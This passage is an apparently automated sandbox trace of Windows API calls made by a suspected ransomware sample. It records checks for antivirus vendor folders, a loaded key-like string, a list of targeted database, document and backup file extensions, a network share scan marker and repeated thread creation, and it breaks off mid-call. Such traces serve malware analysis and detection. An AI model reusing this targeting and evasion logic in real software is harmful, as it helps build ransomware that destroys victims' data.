(Locale=0x400, dwCmpFlags=0x1, lpString1="\\BITDEFENDER", cchCount1=12, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PANDA SECURITY", cchCount1=15, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MCAFEE", cchCount1=7, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KASPERSKY LAB", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.572] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f9a8, nSize=0x105 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwypdmno.exe")) returned 0x2a [0086.572] GetCurrentThreadId () returned 0x3ac [0086.572] GetCurrentThreadId () returned 0x3ac [0086.572] GetCurrentThreadId () returned 0x3ac [0086.572] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x4f54b0 [0086.572] LoadResource (hModule=0x400000, hResInfo=0x4f54b0) returned 0x526a20 [0086.572] SizeofResource (hModule=0x400000, hResInfo=0x4f54b0) returned 0x148 [0086.572] LockResource (hResData=0x526a20) returned 0x526a20 [0086.572] FreeResource (hResData=0x526a20) returned 0 [0086.572] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0086.572] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x525e94 [0086.572] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0086.572] LockResource (hResData=0x525e94) returned 0x525e94 [0086.572] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ed1ef8, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0086.572] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ed1ef8, cbMultiByte=38, lpWideCharStr=0x1eae1ac, cchWideChar=38 | out: lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N\r\n42\r\n") returned 38 [0086.573] FreeResource (hResData=0x525e94) returned 0 [0086.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0086.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x1ed1efc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", lpUsedDefaultChar=0x0) returned 32 [0086.573] GetCurrentThreadId () returned 0x3ac [0086.573] GetCurrentThreadId () returned 0x3ac [0086.573] GetCurrentThreadId () returned 0x3ac [0086.573] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e0c738, cbMultiByte=328, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 328 [0086.573] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e0c738, cbMultiByte=328, lpWideCharStr=0x1e065dc, cchWideChar=328 | out: lpWideCharStr="MDF\r\nNDF\r\nLDF\r\nMYD\r\nEQL\r\nSQL\r\nVHD\r\nSQLITE\r\nSQLITE3\r\nSQLITEDB\r\nHWP\r\nHWT\r\nHML\r\nHWDT\r\nHWPX\r\nCELL\r\nNXL\r\nHCDT\r\nNXT\r\nSHOW\r\nHPT\r\nHSDT\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nDOT\r\nDOTX\r\nODT\r\nODS\r\nBAK\r\nTIB\r\nDBS\r\nDB\r\nDBK\r\nDB2\r\nDB3\r\nDBC\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nSDF\r\nNDF\r\nNS2\r\nNS3\r\nNS4\r\nNSF\r\nACCDB\r\nVPD\r\nDWG\r\nCDR\r\nPDF\r\nJPG\r\nJPEG\r\nPSD\r\nZIP\r\nRAR\r\n7Z\r\nTAR\r\nGZ") returned 328 [0086.573] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.573] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.573] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.573] GetFileAttributesW (lpFileName="-n" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\-n")) returned 0xffffffff [0086.573] GetLastError () returned 0x2 [0086.573] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.573] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.574] LoadStringW (in: hInstance=0x400000, uID=0xffee, lpBuffer=0x19d298, cchBufferMax=4096 | out: lpBuffer="Read") returned 0x4 [0086.574] VirtualQuery (in: lpAddress=0x4dee85, lpBuffer=0x19f50c, dwLength=0x1c | out: lpBuffer=0x19f50c*(BaseAddress=0x4de000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0086.574] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x19f302, nSize=0x105 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwypdmno.exe")) returned 0x2a [0086.574] LoadStringW (in: hInstance=0x400000, uID=0xffca, lpBuffer=0x19d290, cchBufferMax=4096 | out: lpBuffer="Access violation at address %p in module '%s'. %s of address %p") returned 0x3f [0086.574] RtlUnwind (TargetFrame=0x19fc28, TargetIp=0x407c1c, ExceptionRecord=0x19f674, ReturnValue=0x0) [0086.574] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.574] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.574] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.574] GetFileAttributesW (lpFileName="-n" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\-n")) returned 0xffffffff [0086.574] GetLastError () returned 0x2 [0086.575] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.575] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.575] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.575] GetFileAttributesW (lpFileName="-n" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\-n")) returned 0xffffffff [0086.575] GetLastError () returned 0x2 [0086.575] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.575] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.575] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0086.575] GetFileType (hFile=0x3c) returned 0x2 [0086.575] GetConsoleOutputCP () returned 0x1b5 [0086.576] GetFileType (hFile=0x3c) returned 0x2 [0086.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[SHARESSCAN]", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[SHARESSCAN]", cchWideChar=12, lpMultiByteStr=0x1e82f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SHARESSCAN]", lpUsedDefaultChar=0x0) returned 12 [0086.576] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0086.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0086.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0086.576] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0086.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0086.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0086.576] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x19fc00, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x19fc00*=0xe, lpOverlapped=0x0) returned 1 [0086.577] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x19f5dc | out: lpWSAData=0x19f5dc) returned 0 [0086.577] gethostname (in: name=0x19f76c, namelen=512 | out: name="LHnIwsj") returned 0 [0087.755] gethostbyname (name="LHnIwsj") returned 0x22c960*(h_name="LHnIwsj", h_aliases=0x22c970*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x22c974*=([0]="192.168.0.96")) [0087.930] inet_ntoa (in=0x6000a8c0) returned="192.168.0.96" [0087.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x22275c, cbMultiByte=12, lpWideCharStr=0x19e59c, cchWideChar=2047 | out: lpWideCharStr="192.168.0.96瞟\x19ü\x1a\x19瞟\x19ü\x1a\x09") returned 12 [0087.930] WSACleanup () returned 0 [0087.930] GetCurrentThreadId () returned 0x3ac [0087.930] GetCurrentThreadId () returned 0x3ac [0087.930] GetCurrentThreadId () returned 0x3ac [0087.931] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90df0, dwCreationFlags=0x4, lpThreadId=0x1eae1a4 | out: lpThreadId=0x1eae1a4*=0x93c) returned 0x2c0 [0087.931] SetThreadPriority (hThread=0x2c0, nPriority=0) returned 1 [0087.931] ResumeThread (hThread=0x2c0) returned 0x1 [0087.931] Sleep (dwMilliseconds=0xa) [0087.944] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e00, dwCreationFlags=0x4, lpThreadId=0x1eae264 | out: lpThreadId=0x1eae264*=0x920) returned 0x2c4 [0087.945] SetThreadPriority (hThread=0x2c4, nPriority=0) returned 1 [0087.945] ResumeThread (hThread=0x2c4) returned 0x1 [0087.945] Sleep (dwMilliseconds=0xa) [0087.958] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e10, dwCreationFlags=0x4, lpThreadId=0x1eae2c4 | out: lpThreadId=0x1eae2c4*=0x8e4) returned 0x2c8 [0087.958] SetThreadPriority (hThread=0x2c8, nPriority=0) returned 1 [0087.958] ResumeThread (hThread=0x2c8) returned 0x1 [0087.959] Sleep (dwMilliseconds=0xa) [0087.973] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e20, dwCreationFlags=0x4, lpThreadId=0x1eae324 | out: lpThreadId=0x1eae324*=0xbe0) returned 0x2cc [0087.974] SetThreadPriority (hThread=0x2cc, nPriority=0) returned 1 [0087.974] ResumeThread (hThread=0x2cc) returned 0x1 [0087.974] Sleep (dwMilliseconds=0xa) [0087.996] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e30, dwCreationFlags=0x4, lpThreadId=0x1eae384 | out: lpThreadId=0x1eae384*=0x864) returned 0x2d0 [0087.996] SetThreadPriority (hThread=0x2d0, nPriority=0) returned 1 [0087.996] ResumeThread (hThread=0x2d0) returned 0x1 [0087.996] Sleep (dwMilliseconds=0xa) [0088.021] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e40, dwCreationFlags=0x4, lpThreadId=0x1eae3e4 | out: lpThreadId=0x1eae3e4*=0x810) returned 0x2d4 [0088.021] SetThreadPriority (hThread=0x2d4, nPriority=0) returned 1 [0088.021] ResumeThread (hThread=0x2d4) returned 0x1 [0088.021] Sleep (dwMilliseconds=0xa) [0088.036] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e50, dwCreationFlags=0x4, lpThreadId=0x1eae444 | out: lpThreadId=0x1eae444*=0x8dc) returned 0x2d8 [0088.037] SetThreadPriority (hThread=0x2d8, nPriority=0) returned 1 [0088.037] ResumeThread (hThread=0x2d8) returned 0x1 [0088.037] Sleep (dwMilliseconds=0xa) [0088.052] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90df0, dwCreationFlags=0x4, lpThreadId=0x1eae4a4 | out: lpThreadId=0x1eae4a4*=0xa70) returned 0x300 [0088.052] SetThreadPriority (hThread=0x300, nPriority=0) returned 1 [0088.052] ResumeThread (hThread=0x300) returned 0x1 [0088.052] Sleep (dwMilliseconds=0xa) [0088.068] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e20, dwCreationFlags=0x4, lpThreadId=0x1eae504 | out: lpThreadId=0x1eae504*=0x1a0) returned 0x304 [0088.068] SetThreadPriority (hThread=0x304, nPriority=0) returned 1 [0088.068] ResumeThread (hThread=0x304) returned 0x1 [0088.068] Sleep (dwMilliseconds=0xa) [0088.085] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e10, dwCreationFlags=0x4, lpThreadId=0x1eae564 | out: lpThreadId=0x1eae564*=0xc04) returned 0x308 [0088.085] SetThreadPriority (hThread=0x308, nPriority=0) returned 1 [0088.085] ResumeThread (hThread=0x308) returned 0x1 [0088.085] Sleep (dwMilliseconds=0xa) [0088.098] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e30, dwCreationFlags=0x4, lpThreadId=0x1eae5c4 | out: lpThreadId=0x1eae5c4*=0xc08) returned 0x330 [0088.099] SetThreadPriority (hThread=0x330, nPriority=0) returned 1 [0088.099] ResumeThread (hThread=0x330) returned 0x1 [0088.099] Sleep (dwMilliseconds=0xa) [0088.116] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e50, dwCreationFlags=0x4, lpThreadId=0x1eae624 | out: lpThreadId=0x1eae624*=0xc0c) returned 0x334 [0088.117] SetThreadPriority (hThread=0x334, nPriority=0) returned 1 [0088.117] ResumeThread (hThread=0x334) returned 0x1 [0088.117] Sleep (dwMilliseconds=0xa) [0088.131] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e40, dwCreationFlags=0x4, lpThreadId=0x1eae684 | out: lpThreadId=0x1eae684*=0xc10) returned 0x338 [0088.131] SetThreadPriority (hThread=0x338, nPriority=0) returned 1 [0088.132] ResumeThread (hThread=0x338) returned 0x1 [0088.132] Sleep (dwMilliseconds=0xa) [0088.145] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e00, dwCreationFlags=0x4, lpThreadId=0x1eae6e4 | out: lpThreadId=0x1eae6e4*=0xc14) returned 0x33c [0088.146] SetThreadPriority (hThread=0x33c, nPriority=0) returned 1 [0088.146] ResumeThread (hThread=0x33c) returned 0x1 [0088.146] Sleep (dwMilliseconds=0xa) [0088.161] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e60, dwCreationFlags=0x4, lpThreadId=0x1eae744 | out: lpThreadId=0x1eae744*=0xc1c) returned 0x340 [0088.162] SetThreadPriority (hThread=0x340, nPriority=0) returned 1 [0088.162] ResumeThread (hThread=0x340) returned 0x1 [0088.162] Sleep (dwMilliseconds=0xa) [0088.182] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e10, dwCreationFlags=0x4, lpThreadId=0x1eae7a4 | out: lpThreadId=0x1eae7a4*=0xc20) returned 0x368 [0088.183] SetThreadPriority (hThread=0x368, nPriority=0) returned 1 [0088.183] ResumeThread (hThread=0x368) returned 0x1 [0088.183] Sleep (dwMilliseconds=0xa) [0088.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90df0, dwCreationFlags=0x4, lpThreadId=0x1eae804 | out: lpThreadId=0x1eae804*=0xc24) returned 0x36c [0088.209] SetThreadPriority (hThread=0x36c, nPriority=0) returned 1 [0088.209] ResumeThread (hThread=0x36c) returned 0x1 [0088.209] Sleep (dwMilliseconds=0xa) [0088.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e20, dwCreationFlags=0x4, lpThreadId=0x1eae864 | out: lpThreadId=0x1eae864*=0xc28) returned 0x370 [0088.224] SetThreadPriority (hThread=0x370, nPriority=0) returned 1 [0088.224] ResumeThread (hThread=0x370) returned 0x1 [0088.224] Sleep (dwMilliseconds=0xa) [0088.239] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e70, dwCreationFlags=0x4, lpThreadId=0x1eae8c4 | out: lpThreadId=0x1eae8c4*=0xc2c) returned 0x374 [0088.240] SetThreadPriority (hThread=0x374, nPriority=0) returned 1 [0088.240] ResumeThread (hThread=0x374) returned 0x1 [0088.240] Sleep (dwMilliseconds=0xa) [0088.261] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e10, dwCreationFlags=0x4, lpThreadId=0x1eae924 | out: lpThreadId=0x1eae924*=0xc30) returned 0x3c0 [0088.261] SetThreadPriority (hThread=0x3c0, nPriority=0) returned 1 [0088.261] ResumeThread (hThread=0x3c0) returned 0x1 [0088.261] Sleep (dwMilliseconds=0xa) [0088.288] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e30, dwCreationFlags=0x4, lpThreadId=0x1eae984 | out: lpThreadId=0x1eae984*=0xc34) returned 0x3c4 [0088.288] SetThreadPriority (hThread=0x3c4, nPriority=0) returned 1 [0088.289] ResumeThread (hThread=0x3c4) returned 0x1 [0088.289] Sleep (dwMilliseconds=0xa) [0088.302] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e60, dwCreationFlags=0x4, lpThreadId=0x1eae9e4 | out: lpThreadId=0x1eae9e4*=0xc38) returned 0x3c8 [0088.303] SetThreadPriority (hThread=0x3c8, nPriority=0) returned 1 [0088.303] ResumeThread (hThread=0x3c8) returned 0x1 [0088.303] Sleep (dwMilliseconds=0xa) [0088.317] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e00, dwCreationFlags=0x4, lpThreadId=0x1eaea44 | out: lpThreadId=0x1eaea44*=0xc3c) returned 0x3cc [0088.318] SetThreadPriority (hThread=0x3cc, nPriority=0) returned 1 [0088.318] ResumeThread (hThread=0x3cc) returned 0x1 [0088.318] Sleep (dwMilliseconds=0xa) [0088.338] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e10, dwCreationFlags=0x4, lpThreadId=0x1eaeaa4 | out: lpThreadId=0x1eaeaa4*=0xc40) returned 0x404 [0088.339] SetThreadPriority (hThread=0x404, nPriority=0) returned 1 [0088.339] ResumeThread (hThread=0x404) returned 0x1 [0088.339] Sleep (dwMilliseconds=0xa) [0088.367] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90df0, dwCreationFlags=0x4, lpThreadId=0x1eaeb04 | out: lpThreadId=0x1eaeb04*=0xc44) returned 0x408 [0088.367] SetThreadPriority (hThread=0x408, nPriority=0) returned 1 [0088.367] ResumeThread (hThread=0x408) returned 0x1 [0088.367] Sleep (dwMilliseconds=0xa) [0088.380] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e70, dwCreationFlags=0x4, lpThreadId=0x1eaeb64 | out: lpThreadId=0x1eaeb64*=0xc48) returned 0x40c [0088.380] SetThreadPriority (hThread=0x40c, nPriority=0) returned 1 [0088.381] ResumeThread (hThread=0x40c) returned 0x1 [0088.381] Sleep (dwMilliseconds=0xa) [0088.411] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e20, dwCreationFlags=0x4, lpThreadId=0x1eaebc4 | out: lpThreadId=0x1eaebc4*=0xc4c) returned 0x410 [0088.411] SetThreadPriority (hThread=0x410, nPriority=0) returned 1 [0088.411] ResumeThread (hThread=0x410) returned 0x1 [0088.411] Sleep (dwMilliseconds=0xa) [0088.434] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e10, dwCreationFlags=0x4, lpThreadId=0x1eaec24 | out: lpThreadId=0x1eaec24*=0xc50) returned 0x444 [0088.435] SetThreadPriority (hThread=0x444, nPriority=0) returned 1 [0088.435] ResumeThread (hThread=0x444) returned 0x1 [0088.435] Sleep (dwMilliseconds=0xa) [0088.460] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e30, dwCreationFlags=0x4, lpThreadId=0x1eaec84 | out: lpThreadId=0x1eaec84*=0xc54) returned 0x448 [0088.461] SetThreadPriority (hThread=0x448, nPriority=0) returned 1 [0088.461] ResumeThread (hThread=0x448) returned 0x1 [0088.461] Sleep (dwMilliseconds=0xa) [0088.489] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e00, dwCreationFlags=0x4, lpThreadId=0x1eaece4 | out: lpThreadId=0x1eaece4*=0xc58) returned 0x44c [0088.490] SetThreadPriority (hThread=0x44c, nPriority=0) returned 1 [0088.490] ResumeThread (hThread=0x44c) returned 0x1 [0088.490] Sleep (dwMilliseconds=0xa) [0088.507] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e10, dwCreationFlags=0x4, lpThreadId=0x1eaed44 | out: lpThreadId=0x1eaed44*=0xc60) returned 0x480 [0088.508] SetThreadPriority (hThread=0x480, nPriority=0) returned 1 [0088.508] ResumeThread (hThread=0x480) returned 0x1 [0088.508] Sleep (dwMilliseconds=0xa) [0088.523] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90df0, dwCreationFlags=0x4, lpThreadId=0x1eaeda4 | out: lpThreadId=0x1eaeda4*=0xc64) returned 0x484 [0088.523] SetThreadPriority (hThread=0x484, nPriority=0) returned 1 [0088.523] ResumeThread (hThread=0x484) returned 0x1 [0088.523] Sleep (dwMilliseconds=0xa) [0088.552] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e20, dwCreationFlags=0x4, lpThreadId=0x1eaee04 | out: lpThreadId=0x1eaee04*=0xc68) returned 0x488 [0088.553] SetThreadPriority (hThread=0x488, nPriority=0) returned 1 [0088.553] ResumeThread (hThread=0x488) returned 0x1 [0088.553] Sleep (dwMilliseconds=0xa) [0088.567] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e70, dwCreationFlags=0x4, lpThreadId=0x1eaee64 | out: lpThreadId=0x1eaee64*=0xc6c) returned 0x48c [0088.568] SetThreadPriority (hThread=0x48c, nPriority=0) returned 1 [0088.568] ResumeThread (hThread=0x48c) returned 0x1 [0088.568] Sleep (dwMilliseconds=0xa) [0088.626] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e10, dwCreationFlags=0x4, lpThreadId=0x1eaeec4 | out: lpThreadId=0x1eaeec4*=0xc74) returned 0x4b4 [0088.626] SetThreadPriority (hThread=0x4b4, nPriority=0) returned 1 [0088.626] ResumeThread (hThread=0x4b4) returned 0x1 [0088.626] Sleep (dwMilliseconds=0xa) [0088.653] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e30, dwCreationFlags=0x4, lpThreadId=0x1eaef24 | out: lpThreadId=0x1eaef24*=0xc78) returned 0x4b8 [0088.653] SetThreadPriority (hThread=0x4b8, nPriority=0) returned 1 [0088.653] ResumeThread (hThread=0x4b8) returned 0x1 [0088.653] Sleep (dwMilliseconds=0xa) [0088.678] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e00, dwCreationFlags=0x4, lpThreadId=0x1eaef84 | out: lpThreadId=0x1eaef84*=0xc7c) returned 0x4bc [0088.678] SetThreadPriority (hThread=0x4bc, nPriority=0) returned 1 [0088.678] ResumeThread (hThread=0x4bc) returned 0x1 [0088.678] Sleep (dwMilliseconds=0xa) [0088.700] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e10, dwCreationFlags=0x4, lpThreadId=0x1eaefe4 | out: lpThreadId=0x1eaefe4*=0xc84) returned 0x4f0 [0088.701] SetThreadPriority (hThread=0x4f0, nPriority=0) returned 1 [0088.701] ResumeThread (hThread=0x4f0) returned 0x1 [0088.701] Sleep (dwMilliseconds=0xa) [0088.723] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90df0, dwCreationFlags=0x4, lpThreadId=0x1eaf044 | out: lpThreadId=0x1eaf044*=0xc88) returned 0x4f4 [0088.724] SetThreadPriority (hThread=0x4f4, nPriority=0) returned 1 [0088.724] ResumeThread (hThread=0x4f4) returned 0x1 [0088.724] Sleep (dwMilliseconds=0xa) [0088.741] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e70, dwCreationFlags=0x4, lpThreadId=0x1eaf0a4 | out: lpThreadId=0x1eaf0a4*=0xc8c) returned 0x4f8 [0088.741] SetThreadPriority (hThread=0x4f8, nPriority=0) returned 1 [0088.741] ResumeThread (hThread=0x4f8) returned 0x1 [0088.741] Sleep (dwMilliseconds=0xa) [0088.755] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e20, dwCreationFlags=0x4, lpThreadId=0x1eaf104 | out: lpThreadId=0x1eaf104*=0xc90) returned 0x4fc [0088.755] SetThreadPriority (hThread=0x4fc, nPriority=0) returned 1 [0088.755] ResumeThread (hThread=0x4fc) returned 0x1 [0088.755] Sleep (dwMilliseconds=0xa) [0088.770] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e60, dwCreationFlags=0x4, lpThreadId=0x1eaf164 | out: lpThreadId=0x1eaf164*=0xc9c) returned 0x508 [0088.771] SetThreadPriority (hThread=0x508, nPriority=0) returned 1 [0088.771] ResumeThread 